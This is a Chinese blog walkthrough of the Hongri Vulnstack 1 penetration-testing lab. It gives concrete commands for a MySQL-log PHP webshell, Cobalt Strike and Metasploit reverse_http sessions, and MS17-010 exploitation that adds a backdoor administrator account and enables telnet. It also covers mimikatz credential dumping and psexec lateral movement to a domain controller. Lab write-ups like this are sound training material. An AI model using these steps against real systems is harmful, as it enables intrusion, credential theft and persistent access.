红日靶场（一） | adu’s Blog

type

status

date

slug

summary

靶场搭建

地址：http://vulnstack.qiyuanxuetang.net/vuln/?page=2

初始密码均为：hongrisec@2019

修改后密码：

win7：hongrisec@2024

win2003：hongrisec@2024

win2008：hongrisec@2024

打开虚拟机后，只有win7可上网，其他两台不可，另外还需准备一台kali攻击机

主机	IP
win7	192.168.52.143（内网）/192.168.6.139（外网）
win2003	192.168.52.141（内网）
win2008	192.168.52.138（内网）

Web打点

主机探测

netdiscover -r 192.168.6.0/24 -i eth0

然而ping的时候ping不通，可能开启了防火墙

nmap -sS -sV -Pn 192.168.6.139 扫描

开了80 135 3306端口

80端口-存在http网站

3306端口-存在mysql数据库

访问网页，有php探针

服务器信息

php信息

还有数据库连接测试

用dirsearch扫描目录，扫除phpinfo.php（php探针也有打印信息）、phpMyadmin

看一下phpinfo.php（留个心眼）

既然有口子，试试mysql弱口令（root/root）

测试连接成功

前面dirsearch又扫到了phpMyadmin，且网页状态码200，大概率是在管理数据库的，进去看一看（root/root）

查看数据库是否有导入权限，看能否直接导入木马

SHOW GLOBAL VARIABLES LIKE '%secure%’

secure_file_priv 没有导入权限

查看是否有开启日志记录

SHOW GLOBAL VARIABLES LIKE '%general%’

日志记录功能关闭，但是可以开启

SET GLOBAL general_log = ON

SET GLOBAL general_log_file = 'C:/phpstudy/WWW/test.php'

SHOW GLOBAL VARIABLES LIKE '%general%’

整一个木马

select '<?php eval ($_POST[hack]);?>’

执行这条语句之后，日志会将select后的查询语句记录进日志，从而让日志变成一个一句话木马

可以访问test.php了

蚁剑连接

还有个yxcms站点

上cs马

之后上传文件至win7

（当然，此处文件名太明显了哈）

终端执行，运行文件

上线

执行 sleep 0

进行信息收集(蚁剑shell也可

shell whoami

shell systeminfo查看系统信息，有4个补丁，尝试提权

提权成功

内网渗透

内网信息收集

抓取密码，得hash(没明文呐

Ladon读取本机密码同理：（密码仍没有明文

shell ipconfig/all

发现还有一个网段 192.168.52.0/24

shell systeminfo查看是否存在域

好好好

PS:

查看网关IP、DNS ip地址、域名、本机是否和DNS服务器处于同一网段等信息

minikatz抓取明文密码，get

和msf联动

use exploit/multi/handler

set payload windows/meterpreter/reverse_http（跟cs上选用的payload一样）

set lhost 本机ip

exploit 执行

之后

msf生成payload

把生成的文件用蚁剑传上去，并执行，msf可以看到新建了一个会话

为了使除了msf的其它工具也能通过cs反弹过来的会话进入内网，msf建立需要建立socks反向代理

（正向代理就是指内网机器如果不能直接连到外网，建立正向代理可以连到外网，

而反向代理则相反，是外网主机想要进入内网建立的代理）

首先新建路由

run post/multi/manage/autoroute

查看路由

run autoroute -p

挂起会话

background

挂起socket

use auxiliary/server/socks_proxy

set VERSION 4a

set SRVHOST 127.0.0.1

exploit

挂起了一个job

修改proxychains4.conf

vim /etc/proxychains4.conf

arp 探测内网存活主机

use post/windows/gather/arp_scanner

set RHOSTS 192.168.52.0/24

set SESSION 1

exploit

udp协议发现内网存活主机

use auxiliary/scanner/discovery/udp_sweep

set RHOSTS 192.168.52.0/24

exploit

总结共发现内网三台主机

168.52.138

192.168.52.141

192.168.52.143

进入会话，查看域信息

back

sessions -l

sessions -i 会话id

shell

net view

查看主域信息

net view /domain

接下来横向渗透控制其他主机

进行内网其他主机端口扫描

修改proxychains4配置文件

vim /etc/proxychains4.conf

proxychains nmap -sS -sV -Pn 192.168.52.138

proxychains nmap -sS -sV -Pn 192.168.52.141

开发了445端口，试试看永恒之蓝（MS17_010）

use auxiliary/scanner/smb/smb_ms17_010

set RHOSTS 192.168.52.141

exploit

有存在这个漏洞，但获取shell失败

换一个模块

只支持64位，不支持32位

再换，成功了

尝试添加用户

set COMMAND "net user hack 123@abc /add /y”

run

查看是否添加成功

把添加的用户加入管理员组

set COMMAND "net localgroup administrators”

run

尝试开启telnet服务，打开23端口

set COMMAND sc config tlntsvr start= auto

set COMMAND net start telnet

run

查看端口是否开放成功

set COMMAND netstat -ano

run

之后telnet连接

use auxiliary/scanner/telnet/telnet_login set RHOSTS 192.168.52.141 set USERNAME hack set PASSWORD 123@abc run

查看会话

只会重复输出打印命令

background 挂起

141先做到这里

接下来138

开放了80端口，访问后只是iis的初始页面

扫一下目录，并没有发现有用的，有一个跳转后404

同样开放了445端口，试试永恒之蓝

use auxiliary/admin/smb/ms17_010_command set COMMAND net user set RHOST 192.168.52.138 exploit

同样试试添加用户，并把用户加入管理员组

set COMMAND net user hack 123@abc /add run set COMMAND net localgroup administrators hack /add run

开启telnet服务

set COMMAND sc config tlntsvr start= auto exploit set COMMAND net start telnet run

查看端口

set COMMAND netstat -ano

run

并没有开启端口

分析：

win2008默认没有安装telnet服务

上cs

139先提权

用hashdump抓取凭据

之后用mimikatz抓取域内密码

可以看到抓取的域控密码

横向移动

接下来用psexec登录OWA所在域（net view时打印的）

创建beacon smb（以win7为跳板机，所以需要SMB监听

派生一个新的SMB会话

使用派生的SMB会话作为跳板机，运行psexec模块横向登录到其他主机

选中138，填写此前创建的账户信息(会话选中system权限的)

连接成功

进入beacon

ok，拿下域控主机

141也可以这样连接